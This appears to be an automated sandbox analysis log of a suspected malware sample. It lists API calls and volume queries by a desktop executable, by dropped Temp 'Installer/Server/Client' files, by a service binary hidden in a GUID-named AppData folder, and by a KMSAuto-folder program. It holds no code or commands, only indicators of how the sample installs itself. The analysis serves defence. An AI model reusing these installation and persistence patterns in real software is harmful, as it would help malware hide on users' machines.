Source: C:\Windows\explorer.exe	Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,	2_2_0F3E8188
Source: C:\Windows\explorer.exe	Code function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,	2_2_0F3E48F4
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,	2_2_0F3E68D0
Source: C:\Windows\System32\relog.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,	47_2_00007FF6AA349358
Source: C:\Windows\System32\relog.exe	Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,	47_2_00007FF6AA348D34
Source: C:\Windows\System32\relog.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,GetLocaleInfoEx,_invoke_watson,	47_2_00007FF6AA340CD0
Source: C:\Windows\System32\relog.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,	47_2_00007FF6AA3491A0
Source: C:\Windows\System32\relog.exe	Code function: GetLocaleInfoEx,	47_2_00007FF6AA349254
Source: C:\Windows\System32\relog.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	47_2_00007FF6AA346F50
Source: C:\Windows\System32\relog.exe	Code function: EnumSystemLocalesEx,	47_2_00007FF6AA346FB8
Source: C:\Windows\System32\relog.exe	Code function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,	47_2_00007FF6AA346DF4
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: GetLocaleInfoEx,	52_2_00007FF7C9B19254
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,	52_2_00007FF7C9B191A0
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,GetLocaleInfoEx,_invoke_watson,	52_2_00007FF7C9B10CD0
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,	52_2_00007FF7C9B19358
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,	52_2_00007FF7C9B16DF4
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,	52_2_00007FF7C9B18D34
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: EnumSystemLocalesEx,	52_2_00007FF7C9B16FB8
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	52_2_00007FF7C9B16F50
Source: C:\Windows\System32\relog.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	53_2_00007FF7AE496F50
Source: C:\Windows\System32\relog.exe	Code function: EnumSystemLocalesEx,	53_2_00007FF7AE496FB8
Source: C:\Windows\System32\relog.exe	Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,	53_2_00007FF7AE498D34
Source: C:\Windows\System32\relog.exe	Code function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,	53_2_00007FF7AE496DF4
Source: C:\Windows\System32\relog.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,	53_2_00007FF7AE499358
Source: C:\Windows\System32\relog.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,GetLocaleInfoEx,_invoke_watson,	53_2_00007FF7AE490CD0
Source: C:\Windows\System32\relog.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,	53_2_00007FF7AE4991A0
Source: C:\Windows\System32\relog.exe	Code function: GetLocaleInfoEx,	53_2_00007FF7AE499254
Source: C:\Windows\System32\relog.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,	55_2_00007FF7C07D91A0
Source: C:\Windows\System32\relog.exe	Code function: GetLocaleInfoEx,	55_2_00007FF7C07D9254
Source: C:\Windows\System32\relog.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,	55_2_00007FF7C07D9358
Source: C:\Windows\System32\relog.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,GetLocaleInfoEx,_invoke_watson,	55_2_00007FF7C07D0CD0
Source: C:\Windows\System32\relog.exe	Code function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,	55_2_00007FF7C07D6DF4
Source: C:\Windows\System32\relog.exe	Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,	55_2_00007FF7C07D8D34
Source: C:\Windows\System32\relog.exe	Code function: EnumSystemLocalesEx,	55_2_00007FF7C07D6FB8
Source: C:\Windows\System32\relog.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	55_2_00007FF7C07D6F50

Source: C:\Users\user\Desktop\xj40xovMsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\ProgramData\KMSAuto\accc.exe VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
